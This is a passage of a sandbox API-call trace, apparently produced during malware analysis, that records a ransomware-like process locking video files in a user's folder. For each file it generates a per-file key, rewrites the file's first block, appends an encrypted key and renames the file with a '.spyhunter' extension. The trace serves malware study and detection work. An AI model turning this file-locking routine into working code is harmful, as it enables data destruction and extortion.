0x2c0000 [0147.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3a490 | out: hHeap=0x2c0000) returned 1 [0147.516] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee08 | out: pbBuffer=0x270ee08) returned 1 [0147.516] GetProcessHeap () returned 0x2c0000 [0147.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.516] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee00*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee00*=0x30) returned 1 [0147.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\71PWqLyzCgGZPdD.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\d2to6yv_dz9 8f\\71pwqlyzcggzpdd.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.517] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\71PWqLyzCgGZPdD.mp4") returned 95 [0147.517] StrStrW (lpFirst="71PWqLyzCgGZPdD.mp4", lpSrch=".txt") returned 0x0 [0147.517] GetProcessHeap () returned 0x2c0000 [0147.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.517] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270edc4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270edc4*=0x2800, lpOverlapped=0x0) returned 1 [0147.518] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.518] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270edc4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270edc4*=0x2800, lpOverlapped=0x0) returned 1 [0147.518] GetProcessHeap () returned 0x2c0000 [0147.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.518] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.518] WriteFile (in: hFile=0x178, lpBuffer=0x270ee04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270edc4, lpOverlapped=0x0 | out: lpBuffer=0x270ee04*, lpNumberOfBytesWritten=0x270edc4*=0x4, lpOverlapped=0x0) returned 1 [0147.518] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270edc4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270edc4*=0x30, lpOverlapped=0x0) returned 1 [0147.518] CloseHandle (hObject=0x178) returned 1 [0147.518] GetProcessHeap () returned 0x2c0000 [0147.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.518] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\71PWqLyzCgGZPdD.mp4.spyhunter") returned 105 [0147.518] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\71PWqLyzCgGZPdD.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\d2to6yv_dz9 8f\\71pwqlyzcggzpdd.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\D2TO6yV_Dz9 8f\\71PWqLyzCgGZPdD.mp4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\d2to6yv_dz9 8f\\71pwqlyzcggzpdd.mp4.spyhunter")) returned 1 [0147.519] GetProcessHeap () returned 0x2c0000 [0147.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.519] GetProcessHeap () returned 0x2c0000 [0147.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.519] GetProcessHeap () returned 0x2c0000 [0147.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61e58 | out: hHeap=0x2c0000) returned 1 [0147.519] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee08 | out: pbBuffer=0x270ee08) returned 1 [0147.519] GetProcessHeap () returned 0x2c0000 [0147.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.519] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee00*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee00*=0x30) returned 1 [0147.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\32D_ing0aVdcME.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\32d_ing0avdcme.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.520] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\32D_ing0aVdcME.flv") returned 79 [0147.520] StrStrW (lpFirst="32D_ing0aVdcME.flv", lpSrch=".txt") returned 0x0 [0147.520] GetProcessHeap () returned 0x2c0000 [0147.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.520] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270edc4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270edc4*=0x2800, lpOverlapped=0x0) returned 1 [0147.521] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.521] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270edc4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270edc4*=0x2800, lpOverlapped=0x0) returned 1 [0147.521] GetProcessHeap () returned 0x2c0000 [0147.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.521] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.521] WriteFile (in: hFile=0x178, lpBuffer=0x270ee04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270edc4, lpOverlapped=0x0 | out: lpBuffer=0x270ee04*, lpNumberOfBytesWritten=0x270edc4*=0x4, lpOverlapped=0x0) returned 1 [0147.521] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270edc4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270edc4*=0x30, lpOverlapped=0x0) returned 1 [0147.521] CloseHandle (hObject=0x178) returned 1 [0147.521] GetProcessHeap () returned 0x2c0000 [0147.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.521] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\32D_ing0aVdcME.flv.spyhunter") returned 89 [0147.522] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\32D_ing0aVdcME.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\32d_ing0avdcme.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\32D_ing0aVdcME.flv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\32d_ing0avdcme.flv.spyhunter")) returned 1 [0147.522] GetProcessHeap () returned 0x2c0000 [0147.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.522] GetProcessHeap () returned 0x2c0000 [0147.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.523] GetProcessHeap () returned 0x2c0000 [0147.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2fcf8 | out: hHeap=0x2c0000) returned 1 [0147.523] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee00 | out: pbBuffer=0x270ee00) returned 1 [0147.523] GetProcessHeap () returned 0x2c0000 [0147.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.523] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270edf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270edf8*=0x30) returned 1 [0147.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\2moXpInNC3aNbp.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\2moxpinnc3anbp.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.523] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\2moXpInNC3aNbp.avi") returned 79 [0147.523] StrStrW (lpFirst="2moXpInNC3aNbp.avi", lpSrch=".txt") returned 0x0 [0147.523] GetProcessHeap () returned 0x2c0000 [0147.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.524] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270edbc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270edbc*=0x1911, lpOverlapped=0x0) returned 1 [0147.524] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffe6ef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.525] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1911, lpNumberOfBytesWritten=0x270edbc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270edbc*=0x1911, lpOverlapped=0x0) returned 1 [0147.525] GetProcessHeap () returned 0x2c0000 [0147.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.525] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.525] WriteFile (in: hFile=0x178, lpBuffer=0x270edfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270edbc, lpOverlapped=0x0 | out: lpBuffer=0x270edfc*, lpNumberOfBytesWritten=0x270edbc*=0x4, lpOverlapped=0x0) returned 1 [0147.525] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270edbc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270edbc*=0x30, lpOverlapped=0x0) returned 1 [0147.525] CloseHandle (hObject=0x178) returned 1 [0147.525] GetProcessHeap () returned 0x2c0000 [0147.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.525] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\2moXpInNC3aNbp.avi.spyhunter") returned 89 [0147.525] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\2moXpInNC3aNbp.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\2moxpinnc3anbp.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\M4mF2yFAUvRv-\\2moXpInNC3aNbp.avi.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\m4mf2yfauvrv-\\2moxpinnc3anbp.avi.spyhunter")) returned 1 [0147.526] GetProcessHeap () returned 0x2c0000 [0147.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.526] GetProcessHeap () returned 0x2c0000 [0147.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.526] GetProcessHeap () returned 0x2c0000 [0147.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2fc10 | out: hHeap=0x2c0000) returned 1 [0147.527] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee00 | out: pbBuffer=0x270ee00) returned 1 [0147.527] GetProcessHeap () returned 0x2c0000 [0147.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.527] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270edf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270edf8*=0x30) returned 1 [0147.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\hGZHJS6IPDnbT65bd9G.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\hgzhjs6ipdnbt65bd9g.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.527] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\hGZHJS6IPDnbT65bd9G.swf") returned 70 [0147.527] StrStrW (lpFirst="hGZHJS6IPDnbT65bd9G.swf", lpSrch=".txt") returned 0x0 [0147.527] GetProcessHeap () returned 0x2c0000 [0147.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.528] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270edbc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270edbc*=0x2800, lpOverlapped=0x0) returned 1 [0147.528] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.528] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270edbc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270edbc*=0x2800, lpOverlapped=0x0) returned 1 [0147.529] GetProcessHeap () returned 0x2c0000 [0147.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.529] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.529] WriteFile (in: hFile=0x178, lpBuffer=0x270edfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270edbc, lpOverlapped=0x0 | out: lpBuffer=0x270edfc*, lpNumberOfBytesWritten=0x270edbc*=0x4, lpOverlapped=0x0) returned 1 [0147.529] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270edbc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270edbc*=0x30, lpOverlapped=0x0) returned 1 [0147.529] CloseHandle (hObject=0x178) returned 1 [0147.529] GetProcessHeap () returned 0x2c0000 [0147.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.529] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\hGZHJS6IPDnbT65bd9G.swf.spyhunter") returned 80 [0147.529] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\hGZHJS6IPDnbT65bd9G.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\hgzhjs6ipdnbt65bd9g.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\hGZHJS6IPDnbT65bd9G.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\hgzhjs6ipdnbt65bd9g.swf.spyhunter")) returned 1 [0147.530] GetProcessHeap () returned 0x2c0000 [0147.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.530] GetProcessHeap () returned 0x2c0000 [0147.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.530] GetProcessHeap () returned 0x2c0000 [0147.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fee248 | out: hHeap=0x2c0000) returned 1 [0147.530] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270edf8 | out: pbBuffer=0x270edf8) returned 1 [0147.531] GetProcessHeap () returned 0x2c0000 [0147.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.531] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270edf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270edf0*=0x30) returned 1 [0147.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\DkRN3KKTPwNEVKO.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\dkrn3kktpwnevko.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.531] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\DkRN3KKTPwNEVKO.swf") returned 66 [0147.531] StrStrW (lpFirst="DkRN3KKTPwNEVKO.swf", lpSrch=".txt") returned 0x0 [0147.531] GetProcessHeap () returned 0x2c0000 [0147.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.531] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270edb4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270edb4*=0x2800, lpOverlapped=0x0) returned 1 [0147.532] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.532] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270edb4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270edb4*=0x2800, lpOverlapped=0x0) returned 1 [0147.532] GetProcessHeap () returned 0x2c0000 [0147.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.533] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.533] WriteFile (in: hFile=0x178, lpBuffer=0x270edf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270edb4, lpOverlapped=0x0 | out: lpBuffer=0x270edf4*, lpNumberOfBytesWritten=0x270edb4*=0x4, lpOverlapped=0x0) returned 1 [0147.533] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270edb4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270edb4*=0x30, lpOverlapped=0x0) returned 1 [0147.533] CloseHandle (hObject=0x178) returned 1 [0147.533] GetProcessHeap () returned 0x2c0000 [0147.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.533] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\DkRN3KKTPwNEVKO.swf.spyhunter") returned 76 [0147.533] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\DkRN3KKTPwNEVKO.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\dkrn3kktpwnevko.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\DkRN3KKTPwNEVKO.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\dkrn3kktpwnevko.swf.spyhunter")) returned 1 [0147.534] GetProcessHeap () returned 0x2c0000 [0147.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.534] GetProcessHeap () returned 0x2c0000 [0147.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.534] GetProcessHeap () returned 0x2c0000 [0147.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef66c8 | out: hHeap=0x2c0000) returned 1 [0147.534] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270edf8 | out: pbBuffer=0x270edf8) returned 1 [0147.534] GetProcessHeap () returned 0x2c0000 [0147.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.534] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270edf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270edf0*=0x30) returned 1 [0147.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\cEdituYsH9w19TF.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\cedituysh9w19tf.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.535] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\cEdituYsH9w19TF.mkv") returned 66 [0147.535] StrStrW (lpFirst="cEdituYsH9w19TF.mkv", lpSrch=".txt") returned 0x0 [0147.535] GetProcessHeap () returned 0x2c0000 [0147.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.535] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270edb4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270edb4*=0x2800, lpOverlapped=0x0) returned 1 [0147.536] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.536] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270edb4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270edb4*=0x2800, lpOverlapped=0x0) returned 1 [0147.536] GetProcessHeap () returned 0x2c0000 [0147.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.536] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.536] WriteFile (in: hFile=0x178, lpBuffer=0x270edf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270edb4, lpOverlapped=0x0 | out: lpBuffer=0x270edf4*, lpNumberOfBytesWritten=0x270edb4*=0x4, lpOverlapped=0x0) returned 1 [0147.537] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270edb4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270edb4*=0x30, lpOverlapped=0x0) returned 1 [0147.537] CloseHandle (hObject=0x178) returned 1 [0147.537] GetProcessHeap () returned 0x2c0000 [0147.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.537] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\cEdituYsH9w19TF.mkv.spyhunter") returned 76 [0147.537] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\cEdituYsH9w19TF.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\cedituysh9w19tf.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\cEdituYsH9w19TF.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\cedituysh9w19tf.mkv.spyhunter")) returned 1 [0147.538] GetProcessHeap () returned 0x2c0000 [0147.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.538] GetProcessHeap () returned 